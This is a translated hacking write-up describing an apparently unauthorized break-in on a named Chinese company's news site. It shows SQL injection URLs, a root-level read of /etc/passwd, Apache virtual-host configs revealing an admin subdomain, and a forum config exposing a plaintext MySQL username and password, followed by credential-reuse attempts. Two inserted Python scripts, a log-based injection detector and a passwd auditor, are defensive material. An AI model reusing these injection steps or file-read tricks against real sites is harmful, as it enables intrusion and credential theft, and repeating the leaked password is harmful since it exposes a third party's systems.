Author: Leng yuedu cloud
Today anyixuan is a well-known company in China. Let's open this website first! I hope you won't wreck it.
http://www.lengyueduyun.com/news/show.php?id=457 and 1=1/* and http://www.lengyueduyun.com/news/show.php?id=457 and 1=2/* return different results.
http://www.lengyueduyun.com/news/show.php?id=457 order by 14/* returns the page normally.
http://www.lengyueduyun.com/news/show.php?id=457 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14/* echoes columns 2 and 5 on the page.
The /* here is a MySQL comment marker; # and -- also work, and # is submitted as %23 in the URL. (This sentence is boring!)
The injection shows that the current user is root@localhost, the MySQL version is 5.0.45, and the current database is xxx_cms!
user(), version() and database() are all MySQL built-in functions, though there are a few more. (This sentence is redundant...)
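The probe sequence above (tautology pairs, ORDER BY column counting, UNION SELECT, a comment marker to swallow the rest of the query) is exactly what a defender can pick out of the web server's access log. The following Python script is an added example, not code from this write-up or from the site it describes: it assumes Common Log Format lines and uses constructed sample entries with placeholder addresses, decodes each query string, tags the injection patterns per request, and reports clients that trip several distinct rules.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote_plus

# Constructed Common Log Format lines modelled on the probe sequence described
# in the write-up. Client addresses and sizes are placeholders, not page data.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2010:10:00:01 +0800] "GET /news/show.php?id=457 HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2010:10:00:05 +0800] "GET /news/show.php?id=457%20and%201=1/* HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2010:10:00:07 +0800] "GET /news/show.php?id=457%20and%201=2/* HTTP/1.1" 200 1204
10.0.0.5 - - [01/Jan/2010:10:00:12 +0800] "GET /news/show.php?id=457%20order%20by%2014/* HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2010:10:00:20 +0800] "GET /news/show.php?id=457%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14%23 HTTP/1.1" 200 5301
10.0.0.9 - - [01/Jan/2010:10:01:00 +0800] "GET /news/show.php?id=458 HTTP/1.1" 200 4870
"""

# Minimal Common Log Format parser: client, timestamp, method, path, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d+) (?P<size>\S+)'
)

# Each rule is matched against the URL-decoded query string.
RULES = [
    ("tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("comment_terminator", re.compile(r"(?:/\*|#|--\s)\s*$")),
    ("mysql_info_func", re.compile(r"\b(?:user|version|database|load_file)\s*\(", re.I)),
]

# Parameters the application only ever uses as integers (assumption for this example).
NUMERIC_PARAMS = {"id"}


def classify(path):
    """Return the rule names that match one request path's query string."""
    raw_query = path.partition("?")[2]
    decoded = unquote_plus(raw_query)
    tags = [name for name, rx in RULES if rx.search(decoded)]
    # A numeric parameter carrying anything but digits is a signal on its own.
    params = parse_qs(raw_query, keep_blank_values=True)
    if any(not v.strip().isdigit() for key in NUMERIC_PARAMS for v in params.get(key, [])):
        tags.append("non_numeric_id")
    return tags


def analyze(log_text):
    """Group tagged requests by client: {ip: {"requests": n, "rules": [...]}}."""
    per_client = defaultdict(lambda: {"requests": 0, "rules": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("path"))
        if tags:
            rec = per_client[m.group("ip")]
            rec["requests"] += 1
            rec["rules"].update(tags)
    return {ip: {"requests": r["requests"], "rules": sorted(r["rules"])}
            for ip, r in per_client.items()}


def suspicious_clients(log_text, min_rules=2):
    """Clients that triggered at least min_rules distinct rules, sorted by address."""
    return sorted(ip for ip, r in analyze(log_text).items() if len(r["rules"]) >= min_rules)


if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {rec['requests']} tagged requests, rules={rec['rules']}")
    print("suspicious:", suspicious_clients(SAMPLE_LOG))
```

Requiring several distinct rules per client keeps a single false positive (a legitimate article containing "order by" in a search query, say) from paging anyone, while the enumeration-then-union progression shown in the write-up trips four or five of them from one address within seconds.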
With that, it is easy to pull the important data through the injection. There is a user table, and from it I got a lot of backend administrator information.
But what use is the administrator's account and password when the backend can't be found? I scanned with wwwscan and found no sensitive directories. Since the current database user is root, we can try to read sensitive files!
Read /etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
messages:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
www:x:80:80::/home/www:/bin/bash
mq:x:0:0::/home/mq:/bin/bash
#chinaui:x:80:80::/www:/sbin/nologin
ftpdownres:x:80:80::/www/test/res:/sbin/nologin
hbstars:x:80:80::/www/lujing/:/sbin/nologin
chinauiadmin:x:80:80::/www:/sbin/nologin
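The dump above is worth reading with an auditor's eye as well as an attacker's: it contains a second UID-0 account (mq), four accounts sharing UID 80, and a mysql service account with an interactive shell. The following Python script is an added example, not part of the write-up: it parses passwd-format text (a constructed excerpt modelled on the dump, in standard seven-field form) and reports exactly those classes of finding, using the CentOS 5-era convention that UIDs below 500 are system accounts.

```python
from collections import defaultdict

# Constructed /etc/passwd excerpt modelled on the dump in the write-up; entries
# are reconstructed in seven-field form for the example, not copied from the page.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
www:x:80:80::/home/www:/bin/bash
mq:x:0:0::/home/mq:/bin/bash
#chinaui:x:80:80::/www:/sbin/nologin
ftpdownres:x:80:80::/www/test/res:/sbin/nologin
hbstars:x:80:80::/www/lujing/:/sbin/nologin
chinauiadmin:x:80:80::/www:/sbin/nologin
"""

# Shells that cannot be used for an interactive login.
NON_INTERACTIVE_SHELLS = {"", "/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                          "/bin/sync", "/sbin/shutdown", "/sbin/halt"}
# CentOS/RHEL 5 reserve UIDs below 500 for system accounts (assumption for this example).
SYSTEM_UID_MAX = 499


def parse_passwd(text):
    """Parse passwd-format text into dicts; blank and commented-out lines are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "password": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return the account anomalies a reviewer should chase, each as a sorted list."""
    entries = parse_passwd(text)
    by_uid = defaultdict(list)
    for e in entries:
        by_uid[e["uid"]].append(e["name"])
    return {
        # Any UID-0 account other than root is a full root equivalent.
        "extra_uid0": sorted(e["name"] for e in entries
                             if e["uid"] == 0 and e["name"] != "root"),
        # Accounts sharing a UID are indistinguishable to the kernel and to audit logs.
        "shared_uids": {uid: sorted(names) for uid, names in by_uid.items() if len(names) > 1},
        # Service accounts should not be able to log in interactively.
        "system_accounts_with_shell": sorted(
            e["name"] for e in entries
            if 0 < e["uid"] <= SYSTEM_UID_MAX and e["shell"] not in NON_INTERACTIVE_SHELLS),
        # An empty password field means no password is required at all.
        "empty_password": sorted(e["name"] for e in entries if e["password"] == ""),
    }


if __name__ == "__main__":
    for key, value in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{key}: {value}")
```

Run against the real file on a host, the same four checks give a quick answer to the questions this dump raises: who besides root is root, which accounts are aliases of one another, and which daemons could be turned into a login.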
Reading /www/lujing/index.php failed. Perhaps /www/lujing is not the absolute path!
Read /etc/httpd/conf/httpd.conf, the Apache configuration file, to get several subdomains and absolute paths. The real path of the current website is:
<VirtualHost 127.0.0.1:81>
DocumentRoot /www/hbstart/www/
ServerName www.lengyueduyun.com
AddType text/html .html
AddOutputFilter INCLUDES .html
<Directory /www/lujing/www/>
php_value auto_prepend_file "/www/lujing/cms/frame/global.inc.php"
</Directory>
</VirtualHost>
/www/lujing/www/index.php is read successfully. Next, try to read the file containing the MySQL account and password. The following files do not exist:
/www/lujing/www/config.php
/www/lujing/www/conn.php
/www/lujing/www/include/conn.php
/www/lujing/cms/frame/global.inc.php
Then I saw several subdomain names in the Apache configuration and, out of curiosity, typed them into IE. I found that one of them is the subdomain used for this website's admin backend.
<VirtualHost 127.0.0.1:81>
DocumentRoot /www/lujing/cms
ServerName admin.lengyueduyun.com
AddType text/html .html
AddOutputFilter INCLUDES .html
<Directory /www/lujing/cms>
php_value auto_prepend_file "/www/lujing/cms/frame/global.inc.php"
</Directory>
</VirtualHost>
The account and password obtained by injection log in to the backend successfully.
However, a shell still cannot be obtained. No matter how a file is uploaded, it is converted to jpg format! At this point I noticed a DZ forum in the Apache configuration; the version is not clear. I remember the wolf family posted an article about getting a shell on DZ6 through template editing. I'm a complete newbie with the DZ forum! And template editing is not allowed in this backend anyway. I can't get the shell. This time I'm really dizzy; it has been bothering me for a long time!
<VirtualHost 127.0.0.1:81>
DocumentRoot /www/test/bbs/
ServerName forum.xxxx.com
AddType text/html .html
AddOutputFilter INCLUDES .html
ErrorDocument 404 http://forum.xxxx.com/images/avatars/noavatar.gif
<Directory /www/test/bbs>
Reading /www/test/bbs/config.inc.php gives the MySQL account and password! But sadly, phpMyAdmin cannot be found either, and external connections are not allowed.
I thought there would be a subdomain for managing MySQL, but I didn't find one. Luck is always bad. Time to think about social engineering.
$dbhost = 'localhost';    // database server
$dbuser = 'ui_bbs';       // database username
$dbpw = '1107ui1107';     // database password
$dbname = 'xxx_bbs';      // database name
$pconnect = 0;            // persistent connection: 0 = disabled, 1 = enabled
I tried several administrator accounts and some of the MySQL account passwords against them, and none of them worked.